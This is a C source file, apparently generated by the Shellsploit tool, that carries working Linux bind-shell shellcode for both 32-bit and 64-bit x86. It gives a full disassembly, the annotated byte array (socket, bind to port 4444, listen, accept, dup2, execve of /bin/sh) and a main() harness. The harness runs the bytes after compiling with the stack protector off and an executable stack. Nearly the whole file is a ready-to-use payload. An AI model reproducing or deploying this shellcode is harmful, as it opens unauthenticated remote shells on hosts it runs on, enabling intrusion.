/*
|
|
[+] Author : B3mB4m
|
|
[~] Contact : b3mb4m@protonmail.com
|
|
[~] Project : https://github.com/b3mb4m/Shellsploit
|
|
[~] Greetz : Bomberman,T-Rex,KnocKout,ZoRLu
|
|
|
|
|
|
#If you want to test it, you must compile it on an x86 OS.
|
|
#Or basically you can get it with shellsploit.
|
|
#Default setting for port: 4444
|
|
|
|
|
|
00000000 31C0 xor eax,eax
|
|
00000002 40 inc eax
|
|
00000003 7460 jz 0x65
|
|
00000005 31DB xor ebx,ebx
|
|
00000007 F7E3 mul ebx
|
|
00000009 B066 mov al,0x66
|
|
0000000B B301 mov bl,0x1
|
|
0000000D 52 push edx
|
|
0000000E 53 push ebx
|
|
0000000F 6A02 push byte +0x2
|
|
00000011 89E1 mov ecx,esp
|
|
00000013 CD80 int 0x80
|
|
00000015 89C6 mov esi,eax
|
|
00000017 B066 mov al,0x66
|
|
00000019 43 inc ebx
|
|
0000001A 52 push edx
|
|
0000001B 6668115C push word 0x5c11
|
|
0000001F 6653 push bx
|
|
00000021 89E1 mov ecx,esp
|
|
00000023 6A10 push byte +0x10
|
|
00000025 51 push ecx
|
|
00000026 56 push esi
|
|
00000027 89E1 mov ecx,esp
|
|
00000029 CD80 int 0x80
|
|
0000002B B066 mov al,0x66
|
|
0000002D B304 mov bl,0x4
|
|
0000002F 52 push edx
|
|
00000030 56 push esi
|
|
00000031 89E1 mov ecx,esp
|
|
00000033 CD80 int 0x80
|
|
00000035 B066 mov al,0x66
|
|
00000037 B305 mov bl,0x5
|
|
00000039 52 push edx
|
|
0000003A 52 push edx
|
|
0000003B 56 push esi
|
|
0000003C 89E1 mov ecx,esp
|
|
0000003E CD80 int 0x80
|
|
00000040 93 xchg eax,ebx
|
|
00000041 31C9 xor ecx,ecx
|
|
00000043 B102 mov cl,0x2
|
|
00000045 B03F mov al,0x3f
|
|
00000047 CD80 int 0x80
|
|
00000049 49 dec ecx
|
|
0000004A 79F9 jns 0x45
|
|
0000004C 92 xchg eax,edx
|
|
0000004D 50 push eax
|
|
0000004E 682F2F7368 push dword 0x68732f2f
|
|
00000053 682F62696E push dword 0x6e69622f
|
|
00000058 89E3 mov ebx,esp
|
|
0000005A 50 push eax
|
|
0000005B 53 push ebx
|
|
0000005C 89E1 mov ecx,esp
|
|
0000005E 50 push eax
|
|
0000005F 89E2 mov edx,esp
|
|
00000061 B00B mov al,0xb
|
|
00000063 CD80 int 0x80
|
|
00000065 48 dec eax
|
|
00000066 31C0 xor eax,eax
|
|
00000068 48 dec eax
|
|
00000069 31FF xor edi,edi
|
|
0000006B 48 dec eax
|
|
0000006C 31F6 xor esi,esi
|
|
0000006E 48 dec eax
|
|
0000006F 31D2 xor edx,edx
|
|
00000071 4D dec ebp
|
|
00000072 31C0 xor eax,eax
|
|
00000074 6A02 push byte +0x2
|
|
00000076 5F pop edi
|
|
00000077 6A01 push byte +0x1
|
|
00000079 5E pop esi
|
|
0000007A 6A06 push byte +0x6
|
|
0000007C 5A pop edx
|
|
0000007D 6A29 push byte +0x29
|
|
0000007F 58 pop eax
|
|
00000080 0F05 syscall
|
|
00000082 49 dec ecx
|
|
00000083 89C0 mov eax,eax
|
|
00000085 4D dec ebp
|
|
00000086 31D2 xor edx,edx
|
|
00000088 41 inc ecx
|
|
00000089 52 push edx
|
|
0000008A 41 inc ecx
|
|
0000008B 52 push edx
|
|
0000008C C6042402 mov byte [esp],0x2
|
|
00000090 66C7442402115C mov word [esp+0x2],0x5c11
|
|
00000097 48 dec eax
|
|
00000098 89E6 mov esi,esp
|
|
0000009A 41 inc ecx
|
|
0000009B 50 push eax
|
|
0000009C 5F pop edi
|
|
0000009D 6A10 push byte +0x10
|
|
0000009F 5A pop edx
|
|
000000A0 6A31 push byte +0x31
|
|
000000A2 58 pop eax
|
|
000000A3 0F05 syscall
|
|
000000A5 41 inc ecx
|
|
000000A6 50 push eax
|
|
000000A7 5F pop edi
|
|
000000A8 6A01 push byte +0x1
|
|
000000AA 5E pop esi
|
|
000000AB 6A32 push byte +0x32
|
|
000000AD 58 pop eax
|
|
000000AE 0F05 syscall
|
|
000000B0 48 dec eax
|
|
000000B1 89E6 mov esi,esp
|
|
000000B3 48 dec eax
|
|
000000B4 31C9 xor ecx,ecx
|
|
000000B6 B110 mov cl,0x10
|
|
000000B8 51 push ecx
|
|
000000B9 48 dec eax
|
|
000000BA 89E2 mov edx,esp
|
|
000000BC 41 inc ecx
|
|
000000BD 50 push eax
|
|
000000BE 5F pop edi
|
|
000000BF 6A2B push byte +0x2b
|
|
000000C1 58 pop eax
|
|
000000C2 0F05 syscall
|
|
000000C4 59 pop ecx
|
|
000000C5 4D dec ebp
|
|
000000C6 31C9 xor ecx,ecx
|
|
000000C8 49 dec ecx
|
|
000000C9 89C1 mov ecx,eax
|
|
000000CB 4C dec esp
|
|
000000CC 89CF mov edi,ecx
|
|
000000CE 48 dec eax
|
|
000000CF 31F6 xor esi,esi
|
|
000000D1 6A03 push byte +0x3
|
|
000000D3 5E pop esi
|
|
000000D4 48 dec eax
|
|
000000D5 FFCE dec esi
|
|
000000D7 6A21 push byte +0x21
|
|
000000D9 58 pop eax
|
|
000000DA 0F05 syscall
|
|
000000DC 75F6 jnz 0xd4
|
|
000000DE 48 dec eax
|
|
000000DF 31FF xor edi,edi
|
|
000000E1 57 push edi
|
|
000000E2 57 push edi
|
|
000000E3 5E pop esi
|
|
000000E4 5A pop edx
|
|
000000E5 48 dec eax
|
|
000000E6 BF2F2F6269 mov edi,0x69622f2f
|
|
000000EB 6E outsb
|
|
000000EC 2F das
|
|
000000ED 7368 jnc 0x157
|
|
000000EF 48 dec eax
|
|
000000F0 C1EF08 shr edi,byte 0x8
|
|
000000F3 57 push edi
|
|
000000F4 54 push esp
|
|
000000F5 5F pop edi
|
|
000000F6 6A3B push byte +0x3b
|
|
000000F8 58 pop eax
|
|
000000F9 0F05 syscall
|
|
*/
|
|
|
|
|
|
//Project : https://github.com/b3mb4m/Shellsploit
|
|
//This file was created with shellsploit.
|
|
//19/01/2016 - 00:36:45
|
|
//Compile : gcc -fno-stack-protector -z execstack shell.c -o shell
|
|
|
|
/*
 * Payload bytes, split at the instruction boundaries shown in the
 * disassembly above so each stage can be read against that listing.
 * Adjacent literals concatenate, so the array content is identical to
 * the single-literal form: 251 bytes plus the implicit terminating NUL.
 *
 * Reading the listing: the first three bytes are an architecture probe
 * (0x40 is `inc eax` in 32-bit mode and an empty REX prefix in 64-bit
 * mode, so only the 64-bit path takes the jz to offset 0x65). Both paths
 * then issue socket/bind/listen/accept on TCP port 0x115c (4444, the
 * default named in the header), dup2 the accepted socket over fds 0-2,
 * and execve "/bin//sh". From a detection standpoint the observable
 * sequence is an unexpected listener on 4444 followed by a shell whose
 * standard descriptors are a socket.
 */
unsigned char shellcode[] =
    /* 32-bit path (int 0x80, socketcall) */
    "\x31\xc0\x40\x74\x60"                                  /* 0x00 arch probe: xor/inc/jz */
    "\x31\xdb\xf7\xe3\xb0\x66\xb3\x01\x52\x53\x6a\x02\x89\xe1\xcd\x80" /* 0x05 socket() */
    "\x89\xc6\xb0\x66\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80" /* 0x15 bind(), port 0x115c */
    "\xb0\x66\xb3\x04\x52\x56\x89\xe1\xcd\x80"              /* 0x2b listen() */
    "\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80"          /* 0x35 accept() */
    "\x93\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9"      /* 0x40 dup2() loop over fds 2,1,0 */
    "\x92\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80" /* 0x4c execve("/bin//sh") */
    /* 64-bit path (syscall instruction) */
    "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0" /* 0x65 zero rax/rdi/rsi/rdx/r8 */
    "\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05" /* 0x74 socket() */
    "\x49\x89\xc0\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05" /* 0x82 bind(), port 0x115c */
    "\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05"          /* 0xa5 listen() */
    "\x48\x89\xe6\x48\x31\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05" /* 0xb0 accept() */
    "\x59\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6" /* 0xc4 dup2() loop over fds 2,1,0 */
    "\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"; /* 0xde execve("//bin/sh") */
|
|
|
|
/*
 * Test harness: transfers control to the byte array above.
 *
 * The cast treats a writable data object as code. That only works when
 * the data segment is mapped executable, which is what the -z execstack
 * flag in the compile line above arranges; under a normal W^X mapping the
 * jump faults immediately. On success the payload replaces the process
 * image via execve (int 0x80/0xb on the 32-bit path, syscall 0x3b on the
 * 64-bit path), so control does not normally come back to this function.
 */
int main(void)
{
    void (*entry)(void) = (void (*)(void))shellcode;

    entry();
    return 0;
}